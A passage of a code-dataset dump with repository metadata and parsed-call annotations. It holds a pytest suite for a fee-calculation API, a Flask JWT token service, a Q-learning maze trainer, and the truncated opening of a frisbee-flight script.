'torch.sum', 'torch.sum', (), '', False, 'import torch\n'), ((183, 70, 183, 98), 'torch.from_numpy', 'torch.from_numpy', ({(183, 87, 183, 97): 'data_train'}, {}), '(data_train)', False, 'import torch\n'), ((183, 106, 183, 136), 'torch.from_numpy', 'torch.from_numpy', ({(183, 123, 183, 135): 'labels_train'}, {}), '(labels_train)', False, 'import torch\n'), ((183, 165, 183, 194), 'torch.from_numpy', 'torch.from_numpy', ({(183, 182, 183, 193): 'index_train'}, {}), '(index_train)', False, 'import torch\n'), ((184, 62, 184, 88), 'torch.from_numpy', 'torch.from_numpy', ({(184, 79, 184, 87): 'data_val'}, {}), '(data_val)', False, 'import torch\n'), ((184, 96, 184, 124), 'torch.from_numpy', 'torch.from_numpy', ({(184, 113, 184, 123): 'labels_val'}, {}), '(labels_val)', False, 'import torch\n'), ((184, 151, 184, 178), 'torch.from_numpy', 'torch.from_numpy', ({(184, 168, 184, 177): 'index_val'}, {}), '(index_val)', False, 'import torch\n'), ((185, 68, 185, 95), 'torch.from_numpy', 'torch.from_numpy', ({(185, 85, 185, 94): 'data_test'}, {}), '(data_test)', False, 'import torch\n'), ((185, 104, 185, 133), 'torch.from_numpy', 'torch.from_numpy', ({(185, 121, 185, 132): 'labels_test'}, {}), '(labels_test)', False, 'import torch\n'), ((185, 162, 185, 190), 'torch.from_numpy', 'torch.from_numpy', ({(185, 179, 185, 189): 'index_test'}, {}), '(index_test)', False, 'import torch\n'), ((157, 43, 157, 72), 'torch.sum', 'torch.sum', (), '', False, 'import torch\n'), ((77, 39, 77, 71), 'torch.pow', 'torch.pow', ({(77, 50, 77, 67): '(prediction - labels)', (77, 69, 77, 70): '(2)'}, {}), '(prediction - labels, 2)', False, 'import torch\n')] |
saravanpa-aot/sbc-pay | pay-api/tests/unit/api/test_fee.py | fb9f61b99e506e43280bc69531ee107cc12cd92d | # Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the fees end-point.
Test-Suite to ensure that the /fees endpoint is working as expected.
"""
import json
from datetime import date, timedelta
from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType
from pay_api.schemas import utils as schema_utils
from pay_api.utils.enums import Role
from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header
def test_fees_with_corp_type_and_filing_type(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_start_date(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert not schema_utils.validate(rv.json, 'problem')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_start_date(session, client, jwt, app):
"""Assert that the endpoint returns 400."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now + timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 400
assert schema_utils.validate(rv.json, 'problem')[0]
assert not schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_end_date(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(1),
now)
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_end_date(session, client, jwt, app):
"""Assert that the endpoint returns 400."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(2),
now - timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 400
assert schema_utils.validate(rv.json, 'problem')[0]
def test_calculate_fees_with_waive_fees(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(role='staff'), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 0
def test_calculate_fees_with_waive_fees_unauthorized(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 100
def test_fees_with_quantity(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?quantity=10', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_calculate_fees_for_service_fee(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
service_fee = factory_fee_model('SF01', 1.5)
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
service_fee=service_fee)
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 100
assert rv.json.get('serviceFees') == 1.5
def test_calculate_fees_with_zero_service_fee(session, client, jwt, app):
"""Assert that service fee is zero if the filing fee is zero."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 0))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 0
assert rv.json.get('serviceFees') == 0
def test_fee_for_account_fee_settings(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(role=Role.SYSTEM.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/accounts', data=json.dumps(get_gov_account_payload()),
headers=headers)
account_id = rv.json.get('authAccountId')
# Create account fee details.
token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
client.post(f'/api/v1/accounts/{account_id}/fees', data=json.dumps({'accountFees': [
{
'applyFilingFees': False,
'serviceFeeCode': 'TRF02', # 1.0
'product': 'BUSINESS'
}
]}), headers=headers)
# Get fee for this account.
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
# assert filing fee is not applied and service fee is applied
assert rv.json.get('filingFees') == 0
assert rv.json.get('serviceFees') == 1.0
# Now change the settings to apply filing fees and assert
token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
client.put(f'/api/v1/accounts/{account_id}/fees/BUSINESS', data=json.dumps({
'applyFilingFees': True,
'serviceFeeCode': 'TRF01', # 1.5
'product': 'BUSINESS'
}), headers=headers)
# Get fee for this account.
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
# assert filing fee is applied and service fee is applied
assert rv.json.get('filingFees') > 0
assert rv.json.get('serviceFees') == 1.5
def factory_filing_type_model(
filing_type_code: str,
filing_description: str = 'TEST'):
"""Return the filing type model."""
filing_type = FilingType(code=filing_type_code,
description=filing_description)
filing_type.save()
return filing_type
def factory_fee_model(
fee_code: str,
amount: int):
"""Return the fee code model."""
fee_code_master = FeeCode(code=fee_code,
amount=amount)
fee_code_master.save()
return fee_code_master
def factory_corp_type_model(
corp_type_code: str,
corp_type_description: str):
"""Return the corp type model."""
corp_type = CorpType(code=corp_type_code,
description=corp_type_description)
corp_type.save()
return corp_type
def factory_fee_schedule_model(
filing_type: FilingType,
corp_type: CorpType,
fee_code: FeeCode,
fee_start_date: date = date.today(),
fee_end_date: date = None,
service_fee: FeeCode = None):
"""Return the fee schedule model."""
fee_schedule = FeeSchedule(filing_type_code=filing_type.code,
corp_type_code=corp_type.code,
fee_code=fee_code.code,
fee_start_date=fee_start_date,
fee_end_date=fee_end_date
)
if service_fee:
fee_schedule.service_fee_code = service_fee.code
fee_schedule.save()
return fee_schedule
| [((51, 10, 51, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((71, 10, 71, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((91, 10, 91, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((111, 10, 111, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((266, 18, 267, 60), 'pay_api.models.FilingType', 'FilingType', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((276, 22, 277, 44), 'pay_api.models.FeeCode', 'FeeCode', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((286, 16, 287, 59), 'pay_api.models.CorpType', 'CorpType', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((296, 31, 296, 43), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((300, 19, 305, 32), 'pay_api.models.FeeSchedule', 'FeeSchedule', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((30, 27, 30, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((40, 11, 40, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(40, 33, 40, 40): 'rv.json', (40, 42, 40, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((46, 27, 46, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((59, 11, 59, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(59, 33, 59, 40): 'rv.json', (59, 42, 59, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((66, 27, 66, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((79, 11, 79, 52), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(79, 33, 79, 40): 'rv.json', (79, 42, 79, 51): '"""problem"""'}, {}), "(rv.json, 'problem')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((86, 27, 86, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((100, 11, 100, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(100, 33, 100, 40): 'rv.json', (100, 42, 100, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((106, 27, 106, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((120, 11, 120, 52), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(120, 33, 120, 40): 'rv.json', (120, 42, 120, 51): '"""problem"""'}, {}), "(rv.json, 'problem')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((125, 27, 125, 51), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((136, 11, 136, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(136, 33, 136, 40): 'rv.json', (136, 42, 136, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((142, 27, 142, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((153, 11, 153, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(153, 33, 153, 40): 'rv.json', (153, 42, 153, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((159, 27, 159, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((169, 11, 169, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(169, 33, 169, 40): 'rv.json', (169, 42, 169, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((174, 27, 174, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((188, 11, 188, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(188, 33, 188, 40): 'rv.json', (188, 42, 188, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((195, 27, 195, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((207, 11, 207, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(207, 33, 207, 40): 'rv.json', (207, 42, 207, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((214, 27, 214, 61), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((222, 27, 222, 70), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((233, 27, 233, 61), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((237, 11, 237, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(237, 33, 237, 40): 'rv.json', (237, 42, 237, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((243, 27, 243, 70), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((252, 27, 252, 61), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((256, 11, 256, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(256, 33, 256, 40): 'rv.json', (256, 42, 256, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((56, 14, 56, 26), 'datetime.timedelta', 'timedelta', ({(56, 24, 56, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((60, 15, 60, 56), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(60, 37, 60, 44): 'rv.json', (60, 46, 60, 55): '"""problem"""'}, {}), "(rv.json, 'problem')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((76, 14, 76, 26), 'datetime.timedelta', 'timedelta', ({(76, 24, 76, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((80, 15, 80, 53), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(80, 37, 80, 44): 'rv.json', (80, 46, 80, 52): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((96, 14, 96, 26), 'datetime.timedelta', 'timedelta', ({(96, 24, 96, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((116, 14, 116, 26), 'datetime.timedelta', 'timedelta', ({(116, 24, 116, 25): '(2)'}, {}), '(2)', False, 'from datetime import date, timedelta\n'), ((117, 14, 117, 26), 'datetime.timedelta', 'timedelta', ({(117, 24, 117, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((224, 60, 230, 7), 'json.dumps', 'json.dumps', ({(224, 71, 230, 6): "{'accountFees': [{'applyFilingFees': False, 'serviceFeeCode': 'TRF02',\n 'product': 'BUSINESS'}]}"}, {}), "({'accountFees': [{'applyFilingFees': False, 'serviceFeeCode':\n 'TRF02', 'product': 'BUSINESS'}]})", False, 'import json\n'), ((245, 68, 249, 6), 'json.dumps', 'json.dumps', ({(245, 79, 249, 5): "{'applyFilingFees': True, 'serviceFeeCode': 'TRF01', 'product': 'BUSINESS'}"}, {}), "({'applyFilingFees': True, 'serviceFeeCode': 'TRF01', 'product':\n 'BUSINESS'})", False, 'import json\n'), ((216, 57, 216, 82), 'tests.utilities.base_test.get_gov_account_payload', 'get_gov_account_payload', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n')] |
pers0n4/yoonyaho | backend/app/auth/service.py | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | from datetime import datetime, timedelta
import jwt
from flask import current_app
from app import db
from app.user.repository import UserRepository
class AuthService:
def __init__(self) -> None:
self._user_repository = UserRepository(db.session)
def create_token(self, data) -> dict:
user = self._user_repository.find_one(user_id=data["user_id"])
if user is None:
# user not found
raise RuntimeError
if not user.check_password(data["password"]):
# password
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
refresh_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(hours=4),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token, "refresh_token": refresh_token}
def validate_token(self, token) -> dict:
return jwt.decode(token, current_app.config["SECRET_KEY"], algorithms=["HS512"])
def refresh_token(self, token) -> dict:
payload = self.validate_token(token)
user = self._user_repository.find_one(id=payload["user_id"])
if user is None:
# user not found
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token}
| [((12, 32, 12, 58), 'app.user.repository.UserRepository', 'UserRepository', ({(12, 47, 12, 57): 'db.session'}, {}), '(db.session)', False, 'from app.user.repository import UserRepository\n'), ((44, 15, 44, 88), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n'), ((26, 23, 26, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((35, 23, 35, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((55, 23, 55, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((27, 23, 27, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((27, 43, 27, 64), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((36, 23, 36, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((36, 43, 36, 61), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((56, 23, 56, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((56, 43, 56, 64), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n')] |
kebaek/minigrid | scripts/qlearn.py | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | import _init_paths
import argparse
import random
import time
import utils
import os
from collections import defaultdict
import numpy as np
import csv
from progress.bar import IncrementalBar
from utils.hash import *
def parse_arguments():
parser = argparse.ArgumentParser()
# add arguments
parser.add_argument('--env', type=str, default='../env/maze_2.txt',
help='name of the environment')
parser.add_argument("--dir", type=str, default="",
help="name of the directory to episodes")
parser.add_argument('--num_episode', type=int, default=2000,
help='the number of train episodes')
parser.add_argument('--max_episode_length', type=int, default=200,
help='the maximum of the length of an episode')
parser.add_argument('--lr', type=float, default=0.1,
help='the learning rate of the q learning algorithm')
parser.add_argument('--discount', type=float, default=0.9,
help='the discount factor')
parser.add_argument('--eps', type=float, default=0.8,
help='the value for the eps-greedy strategy')
parser.add_argument('--seed', type=int, default=0,
help='random seed for environment')
# parse arguments
args = parser.parse_args()
return args
def train(maze_env, model_dir, num_episode, max_episode_length, lr,
discount, eps, **kwargs):
# create value function and q value function
q_value_function = {}
visited_actions = {}
visited_states = set()
q_value_function = defaultdict(lambda: 0, q_value_function)
visited_actions = defaultdict(lambda: [False]*maze_env.action_space.n, visited_actions)
# train agent
start = time.time()
episodes_length = []
bar = IncrementalBar('Countdown', max = num_episode)
print("Start to train q value function.")
for _ in range(num_episode):
current_length = 0
is_terminal = 0
obs = maze_env.reset()
state = str(maze_env)
while not is_terminal:
visited_states.add(state)
if random.random() <= eps:
action = random.randint(0, maze_env.action_space.n - 1)
else:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
if False in visited_actions[state]:
action = visited_actions[state].index(False)
else:
action = random.randint(0, maze_env.action_space.n - 1)
visited_actions[state][action] = True
next_obs, reward, is_terminal, info = maze_env.step(action)
next_state = str(maze_env)
current_length += 1
next_action, next_q_value = get_max_action(next_state, q_value_function, maze_env)
max_q_value_target = reward + discount*next_q_value
q_value_function[hash_state_action(state, action)] = (1 - lr) * \
q_value_function[hash_state_action(state, action)] + lr*max_q_value_target
state = next_state
bar.next()
episodes_length.append(current_length)
print("Finish training q value function.")
end = time.time()
bar.finish()
print("[Statistics]: Avg_length {0} and Time {1}s".format(sum(episodes_length) / len(episodes_length), end - start))
# output
print("Start to output q value function and policy to file.")
file = open(model_dir + '/q_value.csv', "w")
fieldnames = ['state', 'action', 'value']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for key, value in q_value_function.items():
state, action = reverse_hashing_state_action(key)
writer.writerow({'state':state, 'action':action, 'value':value})
file.close()
file = open(model_dir + '/policy.csv', "w")
fieldnames = ['state', 'action']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for state in visited_states:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
action = -1
writer.writerow({'state':state, 'action':action})
file.close()
print("Finish outputting q value function to file.")
def main():
# parse arguments
args = parse_arguments()
# create env
maze_env = utils.make_env(args.env, args.seed + 10000)
print('Environment Loaded\n')
model_dir = utils.get_model_dir(args.env + '/' + args.dir + '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d'%(args.lr, args.discount, args.eps, args.num_episode, args.seed))
os.makedirs(model_dir, exist_ok=True)
print(model_dir)
# train agent
train(maze_env, model_dir, **vars(args))
if __name__ == '__main__':
main()
| [((15, 13, 15, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((45, 23, 45, 63), 'collections.defaultdict', 'defaultdict', ({(45, 35, 45, 44): 'lambda : 0', (45, 46, 45, 62): 'q_value_function'}, {}), '(lambda : 0, q_value_function)', False, 'from collections import defaultdict\n'), ((46, 22, 46, 91), 'collections.defaultdict', 'defaultdict', ({(46, 34, 46, 73): 'lambda : [False] * maze_env.action_space.n', (46, 75, 46, 90): 'visited_actions'}, {}), '(lambda : [False] * maze_env.action_space.n, visited_actions)', False, 'from collections import defaultdict\n'), ((48, 12, 48, 23), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((50, 10, 50, 56), 'progress.bar.IncrementalBar', 'IncrementalBar', (), '', False, 'from progress.bar import IncrementalBar\n'), ((82, 10, 82, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((90, 13, 90, 56), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n'), ((98, 13, 98, 56), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n'), ((115, 15, 115, 58), 'utils.make_env', 'utils.make_env', ({(115, 30, 115, 38): 'args.env', (115, 40, 115, 57): 'args.seed + 10000'}, {}), '(args.env, args.seed + 10000)', False, 'import utils\n'), ((118, 16, 118, 175), 'utils.get_model_dir', 'utils.get_model_dir', ({(118, 36, 118, 174): "args.env + '/' + args.dir + '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d' % (\n args.lr, args.discount, args.eps, args.num_episode, args.seed)"}, {}), "(args.env + '/' + args.dir + \n '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d' % (args.lr, args.\n discount, args.eps, args.num_episode, args.seed))", False, 'import utils\n'), ((119, 4, 119, 41), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((60, 15, 60, 30), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((61, 25, 61, 71), 'random.randint', 'random.randint', ({(61, 40, 61, 41): '0', (61, 43, 61, 70): 'maze_env.action_space.n - 1'}, {}), '(0, maze_env.action_space.n - 1)', False, 'import random\n'), ((68, 33, 68, 79), 'random.randint', 'random.randint', ({(68, 48, 68, 49): '0', (68, 51, 68, 78): 'maze_env.action_space.n - 1'}, {}), '(0, maze_env.action_space.n - 1)', False, 'import random\n')] |
carrino/FrisPy | research/tunnel.py | db9e59f465ee25d1c037d580c37da8f35b930b50 | import math
from pprint import pprint
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from frispy import Disc
from frispy import Discs
from frispy import Model
model = Discs.roc
mph_to_mps = 0.44704
v = 56 * mph_to_mps
rot = -v / model.diameter
ceiling = 4 # 4 meter ceiling
tunnel_width = 4 # 4 meter wide tunnel
def distance(x):
